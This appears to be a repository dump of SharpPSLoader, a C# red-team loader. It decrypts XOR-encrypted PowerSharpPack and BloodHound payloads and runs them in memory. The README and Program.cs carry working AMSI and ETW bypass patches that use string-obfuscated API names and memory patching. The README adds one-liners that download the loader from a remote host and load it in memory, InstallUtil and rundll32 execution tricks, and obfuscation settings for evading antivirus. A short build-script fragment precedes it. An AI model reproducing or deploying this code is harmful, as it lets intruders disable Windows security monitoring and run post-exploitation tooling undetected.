505 | <nul set /P ={var n=Path.%v%(c,f);if(File.Exists(n)){e(n,m);}else{d.%u%(".config '{0}' is not found.",n);}}if(m.Count^<1){d.%u%("Empty list. Use .config or /p:%c%\n");}else{Result=%r%.Join("|",m.ToArray());}]]^>^</Code^>^</Task^>^</%h%^>^<%h% TaskName="b" TaskFactory="%i%" AssemblyFile="$(%f%)"^>^<%j%^>^<plist/^>^</%j%^>^<Task^>^<%k% %l%="WindowsBase"/^>^<%n% %o%="%m%"/^>^<%n% %o%="%m%.IO"/^>^<%n% %o%="%m%.IO.Packaging"/^>^<%n% %o%="%m%.Net"/^>^<Code Type="Fragment" Language="cs"^>^<![CDATA[var a=@"$(ngserver)";var b=@"$(wpath)";var c=@"$(ngpath)";var d=@"$(proxycfg)".Trim();var e=@"$(debug)"=="true";if(plist==null){%q% false;}ServicePointManager.SecurityProtocol^|=SecurityProtocolType.Tls11^|SecurityProtocolType.Tls12;var f=new %r%[]{"/_rels/","/package/","/[Content_Types].xml"};Action^<%r%,object^>g=%s%(%r% h,object i){if(e){%w%(h,i);}};Func^<%r%,WebProxy^>j=%s%(%r% k){var l=k.Split('@');if(l.Length^<=1){%q% new WebProxy(l[0],false);}var m=l[0].Split(':');%q% new WebProxy(l[1],false){Credentials=new NetworkCredential(m[0],(m.Length^>1)?m[1]:null)};};Func^<%r%,%r%^>n=%s%(%r% i){%q% Path.%v%(b,i??"");};Action^<%r%,%r%,%r%^>o=%s%(%r% p,%r% q,%r% r){var s=Path.GetFullPath(n(r??q));if(%x%.Exists(s)){%w%("`{0}` was found in \"{1}\"",q,s);%q%;}Console.Write("Getting `{0}` ... ",p);var t=Path.%v%(Path.GetTempPath(),Guid.NewGuid().ToString());using(var u=new WebClient()){try{if(!String.%p%(d)){u.Proxy=j(d);}u.Headers.Add("User-Agent","%y% $(%y%)");u.UseDefaultCredentials=true;if(u.Proxy.Credentials==null){u.Proxy.Credentials=CredentialCache.DefaultCredentials;}u.DownloadFile(a+p,t);}catch(Exception v){Console.Error.%u%(v.Message);%q%;}}%w%("Extracting into \"{0}\"",s);using(var w=ZipPackage.Open(t,FileMode.Open,FileAccess.Read)){%t%(var x in w.GetParts()){var y=Uri.UnescapeDataString(x.Uri.OriginalString);if>>%bf%
506 | <nul set /P =(f.Any(z=^>y.StartsWith(z,%z%.Ordinal))){continue;}var _=Path.%v%(s,y.TrimStart('/'));g("- `{0}`",y);var aa=Path.GetDirectoryName(_);if(!%x%.Exists(aa)){%x%.CreateDirectory(aa);}using(Stream ab=x.GetStream(FileMode.Open,FileAccess.Read))using(var ac=File.OpenWrite(_)){try{ab.CopyTo(ac);}catch(FileFormatException v){g("[x]?crc: {0}",_);}}}}File.Delete(t);};%t%(var w in plist.Split(new char[]{plist.IndexOf('^|')!=-1?'^|':';'},(StringSplitOptions)1)){var ad=w.Split(new char[]{':'},2);var p=ad[0];var r=(ad.Length^>1)?ad[1]:null;var q=p.Replace('/','.');if(!String.%p%(c)){r=Path.%v%(c,r??q);}o(p,q,r);}]]^>^</Code^>^</Task^>^</%h%^>^<%h% TaskName="c" TaskFactory="%i%" AssemblyFile="$(%f%)"^>^<Task^>^<%k% %l%="%m%.Xml"/^>^<%k% %l%="%m%.Xml.Linq"/^>^<%k% %l%="WindowsBase"/^>^<%n% %o%="%m%"/^>^<%n% %o%="%m%.Collections.Generic"/^>^<%n% %o%="%m%.IO"/^>^<%n% %o%="%m%.Linq"/^>^<%n% %o%="%m%.IO.Packaging"/^>^<%n% %o%="%m%.Xml.Linq"/^>^<%n% %o%="%m%.Text.RegularExpressions"/^>^<Code Type="Fragment" Language="cs"^>^<![CDATA[var a=@"$(ngin)";var b=@"$(ngout)";var c=@"$(wpath)";var d=@"$(debug)"=="true";var %_%=".nuspec";var EXT_NUPKG=".nupkg";var TAG_META="metadata";var DEF_CONTENT_TYPE="application/octet";var MANIFEST_URL="http://schemas.microsoft.com/packaging/2010/07/manifest";var ID="id";var VER="version";Action^<%r%,object^>e=%s%(%r% f,object g){if(d){%w%(f,g);}};var h=Console.Error;a=Path.%v%(c,a);if(!%x%.Exists(a)){h.%u%("`{0}` is not found.",a);%q% false;}b=Path.%v%(c,b);var i=%x%.GetFiles(a,"*"+%_%,SearchOption.TopDirectoryOnly).FirstOrDefault();if(i==null){h.%u%("{0} is not found in `{1}`",%_%,a);%q% false;}%w%("Found {0}: `{1}`",%_%,i);var j=XDocument.Load(i).Root.Elements().FirstOrDefault(k=^>k.Name.LocalName==TAG_META);if(j==null){h.%u%("{0} does not contain {1}.",i,TAG_META);%q% false;}var l=>>%bf%
507 | <nul set /P =new Dictionary^<%r%,%r%^>();%t%(var m in j.Elements()){l[m.Name.LocalName.ToLower()]=m.Value;}if(l[ID].Length^>100^|^|!Regex.IsMatch(l[ID],@"^\w+([_.-]\w+)*$",RegexOptions.IgnoreCase^|RegexOptions.ExplicitCapture)){h.%u%("The format `{0}` is not correct.",ID);%q% false;}var n=new %r%[]{Path.%v%(a,"_rels"),Path.%v%(a,"package"),Path.%v%(a,"[Content_Types].xml")};var o=%r%.Format("{0}.{1}{2}",l[ID],l[VER],EXT_NUPKG);if(!String.IsNullOrWhiteSpace(b)){if(!%x%.Exists(b)){%x%.CreateDirectory(b);}o=Path.%v%(b,o);}%w%("Creating nupkg `{0}` ...",o);using(var p=Package.Open(o,FileMode.Create)){Uri q=new Uri(String.Format("/{0}{1}",l[ID],%_%),UriKind.Relative);p.CreateRelationship(q,TargetMode.Internal,MANIFEST_URL);%t%(var r in %x%.GetFiles(a,"*.*",SearchOption.AllDirectories)){if(n.Any(k=^>r.StartsWith(k,%z%.Ordinal))){continue;}%r% s;if(r.StartsWith(a,%z%.OrdinalIgnoreCase)){s=r.Substring(a.Length).TrimStart(Path.DirectorySeparatorChar);}else{s=r;}e("- `{0}`",s);var t=%r%.Join("/",s.Split('\\','/').Select(g=^>Uri.EscapeDataString(g)));Uri u=PackUriHelper.CreatePartUri(new Uri(t,UriKind.Relative));var v=p.CreatePart(u,DEF_CONTENT_TYPE,CompressionOption.Maximum);using(Stream w=v.GetStream())using(var x=new FileStream(r,FileMode.Open,FileAccess.Read)){x.CopyTo(w);}}Func^<%r%,%r%^>y=%s%(%r% z){%q%(l.ContainsKey(z))?l[z]:"";};var _=p.PackageProperties;_.Creator=y("authors");_.Description=y("description");_.Identifier=l[ID];_.Version=l[VER];_.Keywords=y("tags");_.Title=y("title");_.LastModifiedBy="%y% $(%y%)";}]]^>^</Code^>^</Task^>^</%h%^>^<%d% Name="Build" %e%="get"/^>^<%a%^>^<%y%^>1.8.0.43837+df76082^</%y%^>^<wpath %b%="'$(wpath)'==''"^>$(MSBuildProjectDirectory)^</wpath^>^</%a%^>^<%d% Name="header"^>^<Message Text="%%0D%%0A%y% $(%y%)%%0D%%0A(c) 2015-2018,2020  Denis Kuzmin [ x-3F@outlook.com ] GitHub/3F%%0D%%0A" >>%bf%
508 | <nul set /P =Importance="high"/^>^</%d%^>^</Project^>>>%bf%
509 | exit/B 0


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # SharpPSLoader
  2 | 
  3 | SharpPSLoader is a loader for [PowerSharpPack](https://github.com/S3cur3Th1sSh1t/PowerSharpPack) and other powershell scripts, designed to bypass AMSI, Constrained Language Mode (CLM), Applocker, and Windows Defender using the [PowerPick](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) technique and LOLBAS binaries. 
  4 | 
  5 | 
  6 | SharpPSLoader works like this: 
  7 | 1. Decrypt single-byte encrypted powershell payload (currently PowerSharpPack & Invoke-Bloodhound) from its resources section
  8 | 2. Bypass AMSI and ETW
  9 | 3. Create custom Powershell runspace and load #1 in-memory 
 10 | 4. Invoke #1 powershell payload with user argument 
 11 | 
 12 | For detailed usage, refer to the `Usage` section below.
 13 | 
 14 | ## Credits 
 15 | All credits goes to [@S3cur3Th1sSh1t](https://github.com/S3cur3Th1sSh1t), [@Jean_Maes_1994](https://twitter.com/Jean_Maes_1994), [@xpn](https://twitter.com/_xpn_), [@3xpl01tc0d3r](https://3xpl01tc0d3r.blogspot.com/), [@mariuszbit/mgeeky](https://twitter.com/mariuszbit), OSEP, and other researchers in the field. I just copy/pasted their code & added couple lines of code and that's all.
 16 | 
 17 | ## Demo 
 18 | SharpPSLoader can be executed on-disk, in-memory, through InstallUtils.exe, and through rundll32.exe. 
 19 | 
 20 | ![demo](/images/Sharppsloader-demo.gif)
 21 | 
 22 | ## Usage 
 23 | 
 24 | SharpPSLoaderConsole and SharpPSLoaderLibrary can be executed with the following syntax: 
 25 | ```
 26 | ./SharpPSLoaderConsole <payload#> <powershell_function & arguments>
 27 | ex) ./SharpPSLoaderConsole 1 powersharppack -rubeus -command "triage"
 28 | ```
 29 | 
 30 | Current list of payloads:
 31 | ```
 32 | 1 = PowerSharpPack 
 33 | 2 = Invoke-Bloodhound 
 34 | ```
 35 | 
 36 | ### SharpPSLoaderConsole - on-disk console 
 37 | ```
 38 | (new-object net.webclient).downloadfile("http://192.168.40.130:8888/SharpPSLoaderConsole.exe","c:\users\low\SharpPSLoaderConsole.exe")
 39 | .\SharpPSLoaderConsole.exe 1 powersharppack -seatbelt -command "-group=user"
 40 | ```
 41 | ### SharpPSLoaderConsole - in-memory 
 42 | ```
 43 | $b = (New-Object net.webclient).DownloadData("http://192.168.40.130:8888/SharpPSLoaderConsole.exe")
 44 | [System.Reflection.Assembly]::Load($b)
 45 | [SharpPSLoaderConsole.SharpPSLoaderConsole]::Main(@("1","Powersharppack -sharpup audit"))
 46 | 
 47 | [SharpPSLoaderConsole.SharpPSLoaderConsole]::Main(@("2","Invoke-Bloodhound -c All"))
 48 | ```
 49 | 
 50 | ### SharpPSLoaderConsole - LOLBAS - InstallUtils.exe, on-disk
 51 | ```
 52 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /p="<payload#> <powershell_function & argument>" /U .\SharpPSLoaderConsole.exe
 53 | 
 54 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /p="1 PowerSharpPack -seatbelt -Command '-group=user'" /U .\SharpPSLoaderConsole.exe
 55 | ```
 56 | 
 57 | ### SharpPSLoaderLibrary - LOLBAS - rundll32.exe, on-disk 
 58 | ```
 59 | (64bit) c:\windows\system32\rundll32.exe SharpPSLoaderLibrary.dll,runLibrary 1 powersharppack -seatbelt -command -group=user 
 60 | 
 61 | (32bit)) C:\Windows\SysWOW64\rundll32.exe SharpPSLoaderLibrary.dll,runLibrary 1 powersharppack -seatbelt -command -group=user
 62 | ```
 63 | 
 64 | ## Usage - Powershell Payloads 
 65 | For detailed usage of PowerSharpPack and Invoke-Bloodhound, refer to the `References` section down below.
 66 | 
 67 | ## Obfuscation - Warning 
 68 | If you want to obfuscate the assembly with confuserEx and execute it in-memory, use the  `SharpPSLoader-confuser.crproj` configuration file as a template. The configuration file's rules were specifically built to not scramble assembly types and not include compressor so the assembly can be executed in-memory. If you know what you are doing, you do you.  
 69 | 
 70 | ```
 71 | <project outputDir="<output-directory>" baseDir="<base-directory>" xmlns="http://confuser.codeplex.com">
 72 |   <module path="SharpPSLoaderConsole.exe">
 73 |     <rule pattern="true" preset="normal" inherit="false">
 74 |       <protection id="resources" />
 75 |       <protection id="rename" action="remove" />
 76 |       <protection id="typescramble" action="remove" />
 77 |       <protection id="constants" />
 78 |       <protection id="ctrl flow" />
 79 |     </rule>
 80 |   </module>
 81 | </project>
 82 | ```
 83 | 
 84 | ## Adding Powershell Payloads 
 85 | Currently, the powershell payloads are encrypted with single-byte XOR bytes with a hardcode key of "111".
 86 | 
 87 | The following powershell script can be used to create a xor encrypted powershell payload.
 88 | ```
 89 | function Invoke-SingleByteXOR{
 90 | 	param($filepath, $key)
 91 | 
 92 |     $xorKey = [System.Convert]::ToByte($key)
 93 | 	$byteString = [System.IO.File]::ReadAllBytes($filepath)
 94 | 
 95 |     $xorData = $(for($i=0; $i -lt $byteString.length; $i++){
 96 |         $byteString[$i] = $byteString[$i] -bxor $xorKey
 97 |     })
 98 | 
 99 |     Set-Content $($filepath+".xor") -Value $byteString -Encoding Byte
100 | }
101 | 
102 | ps> Invoke-SingleByteXOR c:\dev\powerview.ps1 111 
103 | ```
104 | 
105 | Add the xor'ed payload through `Project right click > Properties > Resources > drag/drop the payload`. 
106 | 
107 | Then, edit the switch statement in `DecryptedPSFromRsrcDict` function.  
108 | 
109 | ## References & Credits 
110 | - [PowerSharpPack](https://github.com/S3cur3Th1sSh1t/PowerSharpPack)
111 | - [Bloodhound](https://github.com/BloodHoundAD/BloodHound)
112 | - https://www.netspi.com/blog/technical/adversary-simulation/evolution-of-offensive-powershell-invocation/
113 | - https://github.com/mgeeky/Stracciatella
114 | - https://blog.xpnsec.com/rundll32-your-dotnet/
115 | - https://3xpl01tc0d3r.blogspot.com/2019/11/managed-dll-exports-and-run-via-rundll32.html


--------------------------------------------------------------------------------
/SharpPSLoader.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.31424.327
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpPSLoaderLibrary", "SharpPSLoaderLibrary\SharpPSLoaderLibrary.csproj", "{6D3BF3CF-1137-4609-9934-8309261F710E}"
 7 | EndProject
 8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpPSLoaderConsole", "SharpPSLoaderConsole\SharpPSLoaderConsole.csproj", "{4EA75F8D-F287-47E4-B698-931D90A3A85C}"
 9 | EndProject
10 | Global
11 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | 		Debug|Any CPU = Debug|Any CPU
13 | 		Release|Any CPU = Release|Any CPU
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{6D3BF3CF-1137-4609-9934-8309261F710E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | 		{6D3BF3CF-1137-4609-9934-8309261F710E}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | 		{6D3BF3CF-1137-4609-9934-8309261F710E}.Release|Any CPU.ActiveCfg = Release|Any CPU
19 | 		{6D3BF3CF-1137-4609-9934-8309261F710E}.Release|Any CPU.Build.0 = Release|Any CPU
20 | 		{4EA75F8D-F287-47E4-B698-931D90A3A85C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
21 | 		{4EA75F8D-F287-47E4-B698-931D90A3A85C}.Debug|Any CPU.Build.0 = Debug|Any CPU
22 | 		{4EA75F8D-F287-47E4-B698-931D90A3A85C}.Release|Any CPU.ActiveCfg = Release|Any CPU
23 | 		{4EA75F8D-F287-47E4-B698-931D90A3A85C}.Release|Any CPU.Build.0 = Release|Any CPU
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {D1CE1B70-ACD2-4124-B807-CA3DB20F77CF}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/SharpPSLoaderConsole/App.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8" ?>
2 | <configuration>
3 |     <startup> 
4 |         <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
5 |     </startup>
6 | </configuration>


--------------------------------------------------------------------------------
/SharpPSLoaderConsole/Program.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.Collections.Generic;
  3 | using System.Linq;
  4 | using System.Text;
  5 | using System.Configuration.Install;
  6 | using System.Management.Automation;
  7 | using System.Management.Automation.Runspaces;
  8 | using System.Collections;
  9 | using System.Runtime.InteropServices;
 10 | using System.Reflection;
 11 | 
 12 | /*
 13 |  * References
 14 |  *  - Add reference to c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0\<~>\system.management.automation.dll  and configuration.install 
 15 |  *      
 16 |  * Adding Resources 
 17 |  *  - Project > Properties > Add Resources > Access Modifier = Public 
 18 |  *  - And simply access it like... var thingy = Properties.Resources.<resource-name>
 19 |  *      - Returns "type" by default. ex) .txt file ==> string, byte file ==> byte[] 
 20 |  *  - Thought about adding powershell scripts, decided to just yoink powersharppack and call it a day 
 21 |  * 
 22 |  * */
 23 | 
 24 | namespace SharpPSLoaderConsole
 25 | {
 26 |     public class SharpPSLoaderConsole
 27 |     {
 28 | 
 29 |         public Dictionary<string, byte[]> resourceDict = ParseResources();
 30 | 
 31 |         /// <summary>
 32 |         /// XOR Decrypt powershell byte array payload with key and return raw powershell payload
 33 |         /// </summary>
 34 |         /// <param name="payload"></param>
 35 |         /// <param name="singleByteKey">Default xor decrypt key is 0x6f = 111</param>
 36 |         /// <returns>resultStr, powershell string</returns>
 37 |         public static string DecryptAndStringReturn(byte[] payload, byte singleByteKey = 0x6f)
 38 |         {
 39 |             byte[] result = new byte[payload.Length];
 40 |             for (int i = 0; i < payload.Length; i++)
 41 |             {
 42 |                 result[i] = (byte)(payload[i] ^ singleByteKey);
 43 |             }
 44 | 
 45 |             var resultStr = Encoding.UTF8.GetString(result);
 46 | 
 47 |             return resultStr;
 48 |         }
 49 | 
 50 |         // https://stackoverflow.com/questions/1310812/how-can-i-find-all-the-members-of-a-properties-resources-in-c-sharp
 51 |         /// <summary>
 52 |         /// Parse resources from assembly and create a dictionary of <string, byte[]> where string = Name, byte[] = Encrypted powershell payload.
 53 |         /// </summary>
 54 |         /// <returns>resourceDict</returns>
 55 |         public static Dictionary<string, byte[]> ParseResources()
 56 |         {
 57 |             Dictionary<string, byte[]> resourceDict = new Dictionary<string, byte[]>();
 58 | 
 59 |             List<string> resourceNames = new List<string>();
 60 |             foreach (PropertyInfo property in (typeof(Properties.Resources).GetProperties
 61 |                 (BindingFlags.Static | BindingFlags.Public | BindingFlags.NonPublic)).Skip(2))  // Skip ResourceManager and Culture - hardcoding ftw 
 62 |             {
 63 |                 resourceDict[property.Name.ToLower()] = (byte[])(property.GetValue(null, null));
 64 |             }
 65 |             return resourceDict;
 66 |         }
 67 | 
 68 |         /// <summary>
 69 |         /// Decrypt powershell payload from the resources dictioanry and return the raw powershell payload 
 70 |         /// </summary>
 71 |         /// <param name="resourceDict"></param>
 72 |         /// <param name="payload"></param>
 73 |         /// <returns>decPowershell</returns>
 74 |         public string DecryptedPSFromRsrcDict(Dictionary<string, byte[]> resourceDict, string payload)
 75 |         {
 76 |             // 1. Return encrypted powershell payload byte array 
 77 |             byte[] encPayload = new byte[] { };
 78 | 
 79 | #if DEBUG
 80 |             Console.WriteLine("[+] payload = {0}", payload);
 81 | #endif
 82 | 
 83 |             // 1 = PowerSharpPack 2. Bloodhound 3. Powerview 
 84 |             switch (payload.Trim().ToLower())
 85 |             {
 86 |                 case "1":
 87 |                     encPayload = resourceDict.Where(a => a.Key.Contains("arppac")).Select(a => a.Value).First();
 88 |                     break;
 89 |                 case "2":
 90 |                     encPayload = resourceDict.Where(a => a.Key.Contains("oodhoun")).Select(a => a.Value).First();
 91 |                     break;
 92 |                 
 93 |                 default:
 94 |                     break;
 95 |             }
 96 | 
 97 |             // 2. Decrypt the byte array, and return the raw powershell payload 
 98 |             string decPowershell = DecryptAndStringReturn(encPayload);
 99 | 
100 |             return decPowershell;
101 |         }
102 | 
103 |         public static string ParseFunctionName(string payload)
104 |         {
105 |             var lines = payload.Split(new string[] { Environment.NewLine }, StringSplitOptions.RemoveEmptyEntries);
106 |             string functionName = "";
107 |             foreach (var line in lines)
108 |             {
109 |                 //Console.WriteLine(line);
110 |                 if (line.ToLower().Contains("function"))
111 |                 {
112 |                     functionName = line.Split(' ')[1].Trim().Replace("{", "");
113 |                     break;
114 |                 }
115 |             }
116 | 
117 |             return functionName;
118 |         }
119 | 
120 |         public static bool is64Bit
121 |         {
122 |             get
123 |             {
124 |                 return IntPtr.Size == 8;
125 |             }
126 |         }
127 | 
128 |         // Return required bytes for patching 
129 |         public static byte[] GetPatchBytes(string function)
130 |         {
131 |             byte[] patch;
132 |             List<byte> patchList = new List<byte>();
133 |             if (function.ToLower() == "bypasstw")
134 |             {
135 |                 if (is64Bit)
136 |                 {
137 |                     patch = new byte[2];
138 |                     patch[0] = 0xc3;
139 |                     patch[1] = 0x00;
140 |                 }
141 |                 else
142 |                 {
143 |                     patch = new byte[3];
144 |                     patch[0] = 0xc2;
145 |                     patch[1] = 0x14;
146 |                     patch[2] = 0x00;
147 |                 }
148 | 
149 |                 // Returning for bypassEtw 
150 |                 return patch;
151 |             }
152 | 
153 |             else if (function.ToLower() == "bypasssi")
154 |             {
155 | 
156 |                 if (is64Bit)
157 |                 {
158 |                     patchList = new List<byte>();
159 |                     patchList.Add(0xB8);
160 |                     patchList.Add(0x90);
161 |                     patchList.Add(0x57);
162 |                     patchList.Add(0x00);
163 |                     patchList.Add(0x07);
164 |                     patchList.Add(0x90);
165 |                     patchList.Add(0x80);
166 |                     patchList.Add(0xC3);
167 |                     patchList.RemoveAll(b => b == 0x90);
168 |                 }
169 |                 else
170 |                 {
171 |                     patchList = new List<byte>();
172 |                     patchList.Add(0xB8);
173 |                     patchList.Add(0x90);
174 |                     patchList.Add(0x57);
175 |                     patchList.Add(0x00);
176 |                     patchList.Add(0x07);
177 |                     patchList.Add(0x90);
178 |                     patchList.Add(0x80);
179 |                     patchList.Add(0xC2);
180 |                     patchList.Add(0x90);
181 |                     patchList.Add(0x18);
182 |                     patchList.Add(0x00);
183 |                     patchList.RemoveAll(b => b == 0x90);
184 |                 }
185 | 
186 |                 var patchArr = patchList.ToArray();
187 |                 return patchArr;
188 |             }
189 | 
190 |             else
191 |             {
192 |                 throw new ArgumentException("[-] Incorrect function name argument");
193 |             }
194 |         }
195 | 
196 |         public void bypassTW()
197 |         {
198 |             string susLibraryZ = "nZtZdZlZlZ.dZlZlZ";
199 |             string magicFunctionZ = "EZZtZwZEZvZeZnZtZWZrZiZtZe";
200 |             string susLibrary = susLibraryZ.Replace("Z", "");
201 |             string magicFunction = magicFunctionZ.Replace("Z", "");
202 | 
203 |             IntPtr ntdllAddr = LoadLibrary(susLibrary);
204 |             IntPtr etwWriteEventAddr = GetProcAddress(ntdllAddr, magicFunction);
205 | 
206 |             byte[] magicVoodoo = GetPatchBytes("bypasstw");
207 | 
208 |             // out uint oldProtect is a nice trick, never knew that 
209 |             VirtualProtect(etwWriteEventAddr, (UIntPtr)magicVoodoo.Length, 0x40, out uint oldProtect);
210 |             Marshal.Copy(magicVoodoo, 0, etwWriteEventAddr, magicVoodoo.Length);
211 |             VirtualProtect(etwWriteEventAddr, (UIntPtr)magicVoodoo.Length, oldProtect, out uint newOldProtect);
212 | 
213 | #if DEBUG
214 |             Console.WriteLine("[+] Disabled ETW Tracing");
215 | #endif
216 |         }
217 | 
218 |         public void bypassSI()
219 |         {
220 |             string amsidllZ = "Za" + "mZsZi" + "Z.ZdZ" + "Zll";
221 |             string amsiScanBufferZ = "AZm" + "siSZZc" + "aZnZB" + "uZfZfZer";
222 | 
223 |             string amsiDll = amsidllZ.Replace("Z", "");
224 |             string amsiScanBuffer = amsiScanBufferZ.Replace("Z", "");
225 | 
226 |             IntPtr amsidllAddr = LoadLibrary(amsiDll);
227 |             IntPtr amsiScanBufferAddr = GetProcAddress(amsidllAddr, amsiScanBuffer);
228 | 
229 |             byte[] magicVoodoo = GetPatchBytes("bypasssi");
230 | 
231 |             VirtualProtect(amsiScanBufferAddr, (UIntPtr)magicVoodoo.Length, 0x40, out uint oldProtect);
232 |             Marshal.Copy(magicVoodoo, 0, amsiScanBufferAddr, magicVoodoo.Length);
233 |             VirtualProtect(amsiScanBufferAddr, (UIntPtr)magicVoodoo.Length, oldProtect, out uint newOldProtect);
234 | 
235 | #if DEBUG
236 |             Console.WriteLine("[+] Disabled AMSI");
237 | #endif
238 |         }
239 | 
240 |         public void RunPowershell(string payload, string argument = "")
241 |         {
242 |             argument = argument.TrimStart();
243 | #if DEBUG
244 |             Console.WriteLine("[+] User argument = {0}", argument);
245 | #endif
246 |             string cmd = payload;
247 |             cmd += ";";
248 |             cmd += argument;
249 | 
250 | #if DEBUG
251 |             // Uncomment to see raw powershell payload string in console 
252 |             //Console.WriteLine(cmd);
253 |             //Console.ReadLine();
254 | #endif
255 | 
256 |             Runspace rs = RunspaceFactory.CreateRunspace();
257 |             rs.Open();
258 | 
259 |             PowerShell ps = PowerShell.Create();
260 |             ps.Runspace = rs;
261 |             ps.AddScript(cmd);
262 |             var results = ps.Invoke();
263 | 
264 |             // Result is 0, powershell errored out. 
265 |             if (results.Count == 0)
266 |             {
267 |                 Console.WriteLine("[-] Powershell returned error");
268 |                 return;
269 |             }
270 | 
271 |             // Result is not 0, at least something returned. Write all output and yeet out. 
272 |             foreach (var obj in results)
273 |             {
274 |                 if (obj != null)
275 |                 {
276 |                     Console.WriteLine(obj.BaseObject.ToString());
277 |                 }
278 |             }
279 | 
280 |             rs.Close();
281 |         }
282 | 
283 |         // Empty constructor for now 
284 |         public SharpPSLoaderConsole()
285 |         {
286 | 
287 |         }
288 | 
289 |         // -------------------------------------------------------------------------------------------------
290 |         // Main function for executing SharpPSLoader in console 
291 |         // -------------------------------------------------------------------------------------------------
292 |         public static void Main(string[] args)
293 |         {
294 |             SharpPSLoaderConsole psLoader = new SharpPSLoaderConsole();
295 |             psLoader.bypassSI();
296 |             psLoader.bypassTW();
297 | 
298 |             // Parse argument 
299 |             string powershellPayload = "";
300 |             if (args[0] != null)
301 |             {
302 |                 powershellPayload = psLoader.DecryptedPSFromRsrcDict(psLoader.resourceDict, args[0]);
303 |             }
304 | 
305 |             string argument = String.Join(" ", args.Skip(1));
306 | 
307 |             psLoader.RunPowershell(powershellPayload, argument);
308 |         }
309 | 
310 | 
311 |         [DllImport("kernel32")]
312 |         static extern IntPtr GetProcAddress(
313 |         IntPtr hModule,
314 |         string procName);
315 | 
316 |         [DllImport("kernel32")]
317 |         static extern IntPtr LoadLibrary(
318 |         string name);
319 | 
320 |         [DllImport("kernel32")]
321 |         static extern bool VirtualProtect(
322 |         IntPtr lpAddress,
323 |         UIntPtr dwSize,
324 |         uint flNewProtect,
325 |         out uint lpflOldProtect);
326 |     }
327 | 
328 |     // -------------------------------------------------------------------------------------------------
329 |     // Uninstall function to execute SharpPSLoader through InstallUtil.exe 
330 |     // -------------------------------------------------------------------------------------------------
331 | 
332 |     // C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /p="1 PowerSharpPack -seatbelt -Command '-group=user'" /U .\SharpPSLoader.exe
333 | 
334 |     [System.ComponentModel.RunInstaller(true)]
335 |     public class Sample : System.Configuration.Install.Installer
336 |     {
337 |         public override void Uninstall(IDictionary savedState)
338 |         {
339 |             SharpPSLoaderConsole psLoader = new SharpPSLoaderConsole();
340 | 
341 |             // Are these two needed, when I'm executing through cmd + lolbas? 
342 |             psLoader.bypassSI();
343 |             psLoader.bypassTW();
344 | 
345 |             // Parse argument 
346 |             var userArg = this.Context.Parameters["p"].ToString();
347 |             string payload = userArg.Split(' ')[0];
348 |             int spaceIndex = userArg.IndexOf(' ');
349 |             string argument = userArg.Substring(spaceIndex, userArg.Length - 1);
350 | 
351 | 
352 |             string powershellPayload = "";
353 |             if (payload != null)
354 |             {
355 |                 powershellPayload = psLoader.DecryptedPSFromRsrcDict(psLoader.resourceDict, payload);
356 |             }
357 | 
358 |             psLoader.RunPowershell(powershellPayload, argument);
359 |         }
360 |     }
361 | }


--------------------------------------------------------------------------------
/SharpPSLoaderConsole/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // General Information about an assembly is controlled through the following
 6 | // set of attributes. Change these attribute values to modify the information
 7 | // associated with an assembly.
 8 | [assembly: AssemblyTitle("SharpPSLoaderConsole")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SharpPSLoaderConsole")]
13 | [assembly: AssemblyCopyright("Copyright ©  2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components.  If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 | 
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("4ea75f8d-f287-47e4-b698-931d90a3a85c")]
24 | 
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | //      Major Version
28 | //      Minor Version
29 | //      Build Number
30 | //      Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/SharpPSLoaderConsole/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
 1 | //------------------------------------------------------------------------------
 2 | // <auto-generated>
 3 | //     This code was generated by a tool.
 4 | //     Runtime Version:4.0.30319.42000
 5 | //
 6 | //     Changes to this file may cause incorrect behavior and will be lost if
 7 | //     the code is regenerated.
 8 | // </auto-generated>
 9 | //------------------------------------------------------------------------------
10 | 
11 | namespace SharpPSLoaderConsole.Properties {
12 |     using System;
13 |     
14 |     
